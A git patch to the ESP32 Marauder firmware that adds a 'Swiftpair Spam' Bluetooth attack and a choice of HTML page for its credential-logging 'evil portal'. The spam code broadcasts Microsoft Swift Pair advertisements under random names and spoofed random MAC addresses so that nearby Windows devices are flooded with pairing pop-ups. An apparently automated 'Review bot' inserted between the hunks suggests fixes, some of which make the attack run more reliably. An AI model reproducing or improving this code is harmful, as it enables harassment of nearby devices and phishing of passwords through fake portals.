From 66d0ae467dfe58b1a545fb654cb5eff41badbc11 Mon Sep 17 00:00:00 2001 From: Just Call Me Koko Date: Tue, 17 Oct 2023 16:18:03 -0400 Subject: [PATCH 1/2] Add Swiftpair spam --- esp32_marauder/CommandLine.cpp | 26 ++++++- esp32_marauder/CommandLine.h | 4 +- esp32_marauder/EvilPortal.cpp | 2 +- esp32_marauder/EvilPortal.h | 2 + esp32_marauder/MenuFunctions.cpp | 7 ++ esp32_marauder/WiFiScan.cpp | 121 +++++++++++++++++++++++++++++++ esp32_marauder/WiFiScan.h | 5 ++ esp32_marauder/configs.h | 2 +- 8 files changed, 165 insertions(+), 4 deletions(-) diff --git a/esp32_marauder/CommandLine.cpp b/esp32_marauder/CommandLine.cpp index c4ac82fca..0ccaa9d70 100644 --- a/esp32_marauder/CommandLine.cpp +++ b/esp32_marauder/CommandLine.cpp @@ -250,6 +250,7 @@ void CommandLine::runCommand(String input) { #ifdef HAS_BT Serial.println(HELP_BT_SNIFF_CMD); Serial.println(HELP_BT_SOUR_APPLE_CMD); + Serial.println(HELP_BT_SWIFTPAIR_SPAM_CMD); #ifdef HAS_GPS Serial.println(HELP_BT_WARDRIVE_CMD); #endif @@ -482,6 +483,7 @@ void CommandLine::runCommand(String input) { // AP Scan else if (cmd_args.get(0) == EVIL_PORTAL_CMD) { int cmd_sw = this->argSearch(&cmd_args, "-c"); + int html_sw = this->argSearch(&cmd_args, "-w"); if (cmd_sw != -1) { String et_command = cmd_args.get(cmd_sw + 1); @@ -491,6 +493,14 @@ void CommandLine::runCommand(String input) { display_obj.clearScreen(); menu_function_obj.drawStatusBar(); #endif + if (html_sw != -1) { + String target_html_name = cmd_args.get(html_sw + 1); + evil_portal_obj.target_html_name = target_html_name; + Serial.println("Set html file as " + evil_portal_obj.target_html_name); + } + //else { + // evil_portal_obj.target_html_name = "index.html"; + //} wifi_scan_obj.StartScan(WIFI_SCAN_EVIL_PORTAL, TFT_MAGENTA); } else if (et_command == "reset") { 
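Review bot: In the `-c start` branch, `cmd_args.get(html_sw + 1)` is read without checking that an argument actually follows `-w`; if `-w` is the last token the file name becomes whatever `get` returns for an out-of-range index (presumably an empty String), and that value is then stored in `evil_portal_obj.target_html_name` and echoed as set. Guard it with `if (html_sw != -1 && html_sw + 1 < cmd_args.size())` (if `cmd_args` exposes a `size()`), and the same applies to `cmd_args.get(cmd_sw + 2)` in the `sethtml` branch of the next hunk. The commented-out `else` that would reset the name to `index.html` should either be restored or deleted; as committed, a name set by an earlier `-w` silently persists into later `-c start` runs. `runCommand` continues outside the hunk.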
@@ -500,7 +510,9 @@ void CommandLine::runCommand(String input) { } else if (et_command == "sethtml") { - + String target_html_name = cmd_args.get(cmd_sw + 2); + evil_portal_obj.target_html_name = target_html_name; + Serial.println("Set html file as " + evil_portal_obj.target_html_name); } else if (et_command == "setap") { @@ -784,6 +796,18 @@ void CommandLine::runCommand(String input) { Serial.println("Bluetooth not supported"); #endif } + else if (cmd_args.get(0) == BT_SWIFTPAIR_SPAM_CMD) { + #ifdef HAS_BT + Serial.println("Starting Swiftpair Spam attack. Stop with " + (String)STOPSCAN_CMD); + #ifdef HAS_SCREEN + display_obj.clearScreen(); + menu_function_obj.drawStatusBar(); + #endif + wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN); + #else + Serial.println("Bluetooth not supported"); + #endif + } // Wardrive else if (cmd_args.get(0) == BT_WARDRIVE_CMD) { #ifdef HAS_BT diff --git a/esp32_marauder/CommandLine.h b/esp32_marauder/CommandLine.h index 157e57973..c2bff8b1f 100644 --- a/esp32_marauder/CommandLine.h +++ b/esp32_marauder/CommandLine.h @@ -78,6 +78,7 @@ const char PROGMEM SSID_CMD[] = "ssid"; // Bluetooth sniff/scan const char PROGMEM BT_SNIFF_CMD[] = "sniffbt"; const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple"; +const char PROGMEM BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair"; const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive"; const char PROGMEM BT_SKIM_CMD[] = "sniffskim"; @@ -96,7 +97,7 @@ const char PROGMEM HELP_GPS_DATA_CMD[] = "gpsdata"; const char PROGMEM HELP_GPS_CMD[] = "gps [-g] "; // WiFi sniff/scan -const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start]"; +const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start [-w html.html]/sethtml ]"; const char PROGMEM HELP_SIGSTREN_CMD[] = "sigmon"; const char PROGMEM HELP_SCANAP_CMD[] = "scanap"; const char PROGMEM HELP_SCANSTA_CMD[] = "scansta"; 
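Review bot: The updated help string `"evilportal [-c start [-w html.html]/sethtml ]"` does not show that `sethtml` takes a file name, even though the `sethtml` branch in CommandLine.cpp reads one from `cmd_args.get(cmd_sw + 2)`, and the trailing `/sethtml ]` reads like a literal path. Something like `"evilportal [-c start [-w html.html]/sethtml <html.html>]"`, or a second constant on the pattern of `HELP_SSID_CMD_B`, would make the argument visible to the user who asks for help.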
@@ -124,6 +125,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r "; // Bluetooth sniff/scan const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt"; const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple"; +const char PROGMEM HELP_BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair"; const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]"; const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim"; const char PROGMEM HELP_FOOT[] = "=================================="; diff --git a/esp32_marauder/EvilPortal.cpp b/esp32_marauder/EvilPortal.cpp index 86c5b8c26..c55b783c5 100644 --- a/esp32_marauder/EvilPortal.cpp +++ b/esp32_marauder/EvilPortal.cpp @@ -65,7 +65,7 @@ void EvilPortal::setupServer() { bool EvilPortal::setHtml() { Serial.println("Setting HTML..."); #ifndef WRITE_PACKETS_SERIAL - File html_file = sd_obj.getFile("/index.html"); + File html_file = sd_obj.getFile("/" + this->target_html_name); if (!html_file) { #ifdef HAS_SCREEN this->sendToDisplay("Could not find /index.html."); diff --git a/esp32_marauder/EvilPortal.h b/esp32_marauder/EvilPortal.h index 2e8923d68..19e3f7cb9 100644 --- a/esp32_marauder/EvilPortal.h +++ b/esp32_marauder/EvilPortal.h @@ -99,6 +99,8 @@ class EvilPortal { public: EvilPortal(); + String target_html_name = "index.html"; + String get_user_name(); String get_password(); void addLog(String log, int len); diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp index e5151bd60..05f1c4539 100644 --- a/esp32_marauder/MenuFunctions.cpp +++ b/esp32_marauder/MenuFunctions.cpp 
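Review bot: `EvilPortal::setHtml` now opens `"/" + this->target_html_name`, but the failure message a few lines later still says `"Could not find /index.html."`, so a mistyped `-w`/`sethtml` name is reported as a missing index.html. Change it to `this->sendToDisplay("Could not find /" + this->target_html_name + ".");` (if `sendToDisplay` accepts a `String`). Since the name comes straight from the command line and is joined into the SD path unchecked, it is also worth rejecting values containing `/` or `..` where it is assigned, so the portal stays confined to files in the card's root. `setHtml` continues outside the hunk.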
@@ -495,6 +495,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) || (wifi_scan_obj.currentScanMode == BT_SCAN_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS)) @@ -552,6 +553,7 @@ void MenuFunctions::main(uint32_t currentTime) (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) || (wifi_scan_obj.currentScanMode == BT_SCAN_ALL) || (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) || + (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) || @@ -1419,6 +1421,11 @@ void MenuFunctions::RunSetup() this->drawStatusBar(); wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN); }); + this->addNodes(&bluetoothAttackMenu, "Swiftpair Spam", TFT_CYAN, NULL, KEYBOARD_ICO, [this]() { + display_obj.clearScreen(); + this->drawStatusBar(); + wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN); + }); // Device menu deviceMenu.parentMenu = &mainMenu; diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp index ce378554d..f03346ef2 100644 --- a/esp32_marauder/WiFiScan.cpp +++ b/esp32_marauder/WiFiScan.cpp @@ -17,6 +17,11 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32 return 0; } +extern "C" { + uint8_t esp_base_mac_addr[6]; + esp_err_t esp_ble_gap_set_rand_addr(const uint8_t *rand_addr); +} + #ifdef HAS_BT //ESP32 Sour Apple by RapierXbox //Exploit by ECTO-1A 
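Review bot: The new `extern "C"` block in WiFiScan.cpp defines `uint8_t esp_base_mac_addr[6]` (a definition, so it emits a global symbol rather than declaring one) and declares `esp_ble_gap_set_rand_addr`, but nothing else in this patch references either; `executeSwiftpairSpam` later calls `esp_base_mac_addr_set` instead. Unless a follow-up change needs them, delete the block, or at least turn the array into `extern uint8_t esp_base_mac_addr[6];` so this translation unit does not introduce a stray global that could collide with a symbol of the same name elsewhere.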
@@ -48,6 +53,37 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32 return randomAdvertisementData; } + NimBLEAdvertisementData getSwiftAdvertisementData() { + extern WiFiScan wifi_scan_obj; + NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData(); + const char* display_name = wifi_scan_obj.generateRandomName(); + uint8_t display_name_len = strlen(display_name); + + uint8_t size = 7 + display_name_len; + uint8_t* packet = (uint8_t*)malloc(size); + uint8_t i = 0; + + packet[i++] = size - 1; // Size + packet[i++] = 0xFF; // AD Type (Manufacturer Specific) + packet[i++] = 0x06; // Company ID (Microsoft) + packet[i++] = 0x00; // ... + packet[i++] = 0x03; // Microsoft Beacon ID + packet[i++] = 0x00; // Microsoft Beacon Sub Scenario + packet[i++] = 0x80; // Reserved RSSI Byte + for (int j = 0; j < display_name_len; j++) { + packet[i + j] = display_name[j]; + } + i += display_name_len; + + randomAdvertisementData.addData(std::string((char *)packet, size)); + + free(packet); + + free((void*)display_name); + + return randomAdvertisementData; + } + class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks { void onResult(BLEAdvertisedDevice *advertisedDevice) { @@ -447,6 +483,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color) RunSourApple(scan_mode, color); #endif } + else if (scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) { + #ifdef HAS_BT + RunSwiftpairSpam(scan_mode, color); + #endif + } else if ((scan_mode == BT_SCAN_WAR_DRIVE) || (scan_mode == BT_SCAN_WAR_DRIVE_CONT)) { #ifdef HAS_BT @@ -611,6 +652,7 @@ void WiFiScan::StopScan(uint8_t scan_mode) else if ((currentScanMode == BT_SCAN_ALL) || (currentScanMode == BT_ATTACK_SOUR_APPLE) || + (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) || (currentScanMode == BT_SCAN_WAR_DRIVE) || (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) || (currentScanMode == BT_SCAN_SKIMMERS)) 
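Review bot: `getSwiftAdvertisementData` uses the result of `malloc(size)` without a null check and then relies on `free((void*)display_name)` to release a buffer whose ownership is invisible in `generateRandomName`'s `const char*` return type; on a heap-tight ESP32 the first is a null-pointer write, and the second is the kind of contract a future caller will miss. Building `packet` as a `std::string` (`reserve(7 + display_name_len)`, `push_back` the seven header bytes, then `append(display_name, display_name_len)`) removes the malloc/free pair entirely, and `addData` can take it directly. The cast-and-`free` on `display_name` disappears as well if `generateRandomName` returns a `String` or `std::string` (see the hunk that defines it).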
@@ -1407,6 +1449,46 @@ void WiFiScan::executeSourApple() { #endif } +const char* WiFiScan::generateRandomName() { + const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; + int len = rand() % 10 + 1; // Generate a random length between 1 and 10 + char* randomName = (char*)malloc((len + 1) * sizeof(char)); // Allocate memory for the random name + for (int i = 0; i < len; ++i) { + randomName[i] = charset[rand() % strlen(charset)]; // Select random characters from the charset + } + randomName[len] = '\0'; // Null-terminate the string + return randomName; +} + +void WiFiScan::generateRandomMac(uint8_t* mac) { + for (int i = 0; i < 6; i++) { + mac[i] = random(0, 255); + } +} + +void WiFiScan::executeSwiftpairSpam() { + #ifdef HAS_BT + uint8_t macAddr[6]; + generateRandomMac(macAddr); + + esp_base_mac_addr_set(macAddr); + + NimBLEDevice::init(""); + + NimBLEServer *pServer = NimBLEDevice::createServer(); + + pAdvertising = pServer->getAdvertising(); + + NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData(); + pAdvertising->setAdvertisementData(advertisementData); + pAdvertising->start(); + delay(10); + pAdvertising->stop(); + + NimBLEDevice::deinit(); + #endif +} + void WiFiScan::executeWarDrive() { #ifdef HAS_GPS if (gps_obj.getGpsModuleStatus()) { 
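Review bot: `generateRandomMac` fills all 48 bits at random, so half of the generated addresses have the multicast bit set in `mac[0]`; as far as I recall recent ESP-IDF releases reject such a base MAC with `ESP_ERR_INVALID_ARG`, and `executeSwiftpairSpam` discards the return value of `esp_base_mac_addr_set`, so those iterations silently keep the previous address. Add `mac[0] = (mac[0] & 0xFE) | 0x02; // unicast, locally administered` after the loop and check the result of `esp_base_mac_addr_set`. Arduino `random(min, max)` excludes `max`, so `random(0, 255)` never yields 0xFF; `random(0, 256)` covers the full byte. `generateRandomName` returns a malloc'd buffer through a `const char*`, which hides that the caller must `free` it (and `strlen(charset)` is recomputed for every character); returning `String` and declaring it so in WiFiScan.h would make the ownership explicit.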
@@ -1781,6 +1863,26 @@ void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) { #endif } +void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) { + #ifdef HAS_BT + #ifdef HAS_SCREEN + display_obj.TOP_FIXED_AREA_2 = 48; + display_obj.tteBar = true; + display_obj.print_delay_1 = 15; + display_obj.print_delay_2 = 10; + display_obj.initScrollValues(true); + display_obj.tft.setTextWrap(false); + display_obj.tft.setTextColor(TFT_BLACK, color); + display_obj.tft.fillRect(0,16,240,16, color); + display_obj.tft.drawCentreString("Swiftpair Spam",120,16,2); + display_obj.touchToExit(); + display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK); + #endif + + this->ble_initialized; + #endif +} + // Function to start running any BLE scan void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color) { @@ -4125,6 +4227,25 @@ void WiFiScan::main(uint32_t currentTime) this->executeSourApple(); #endif } + else if (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) { + #ifdef HAS_BT + if (currentTime - initTime >= 1000) { + initTime = millis(); + String displayString = ""; + String displayString2 = ""; + displayString.concat("Advertising Data..."); + for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++) + displayString2.concat(" "); + #ifdef HAS_SCREEN + display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK); + display_obj.showCenterText(displayString2, 160); + display_obj.showCenterText(displayString, 160); + #endif + } + + this->executeSwiftpairSpam(); + #endif + } else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) { if (currentTime - initTime >= this->channel_hop_delay * 1000) { diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index 6392388e6..b84856be6 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -82,6 +82,7 @@ #define BT_SCAN_WAR_DRIVE 34 #define BT_SCAN_WAR_DRIVE_CONT 35 #define BT_ATTACK_SOUR_APPLE 36 +#define BT_ATTACK_SWIFTPAIR_SPAM 37 #define GRAPH_REFRESH 100 
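Review bot: In `RunSwiftpairSpam` the line `this->ble_initialized;` is an expression statement with no effect (the value is read and discarded; `-Wunused-value` flags it), so whatever it was meant to record is not recorded. Presumably it should be `this->ble_initialized = true;`, matching whatever `RunSourApple` does with that flag outside the hunk; if the flag is not needed here, drop the line. The `scan_mode` parameter is unused, which matches the existing `Run*` signatures but deserves a `(void)scan_mode;` or a comment. In `WiFiScan::main`, `executeSwiftpairSpam` runs `NimBLEDevice::init`/`deinit` on every loop iteration, presumably so the new base MAC is picked up; a one-line comment saying so would spare the next reader from "optimizing" it away.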
@@ -251,7 +252,9 @@ class WiFiScan void clearMacHistory(); void executeWarDrive(); void executeSourApple(); + void executeSwiftpairSpam(); void startWardriverWiFi(); + void generateRandomMac(uint8_t* mac); void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string); @@ -284,6 +287,7 @@ class WiFiScan void RunPacketMonitor(uint8_t scan_mode, uint16_t color); void RunBluetoothScan(uint8_t scan_mode, uint16_t color); void RunSourApple(uint8_t scan_mode, uint16_t color); + void RunSwiftpairSpam(uint8_t scan_mode, uint16_t color); void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color); void RunEvilPortal(uint8_t scan_mode, uint16_t color); bool checkMem(); @@ -346,6 +350,7 @@ class WiFiScan void main(uint32_t currentTime); void StartScan(uint8_t scan_mode, uint16_t color = 0); void StopScan(uint8_t scan_mode); + const char* generateRandomName(); //void addLog(String log, int len); static void getMAC(char *addr, uint8_t* data, uint16_t offset); diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h index 8991d2b1a..af53a9893 100644 --- a/esp32_marauder/configs.h +++ b/esp32_marauder/configs.h @@ -22,7 +22,7 @@ //#define XIAO_ESP32_S3 //// END BOARD TARGETS - #define MARAUDER_VERSION "v0.13.1" + #define MARAUDER_VERSION "v0.13.2" //// BOARD FEATURES #ifdef MARAUDER_M5STICKC From 86c0857239eeea453ca004cb0b2a6eda16c44290 Mon Sep 17 00:00:00 2001 From: Just Call Me Koko Date: Tue, 17 Oct 2023 16:18:33 -0400 Subject: [PATCH 2/2] Increment version number --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index bc3f949f6..80b352255 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ -# ESP32 Marauder v0.13.1 +# ESP32 Marauder v0.13.2

Marauder logo

A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32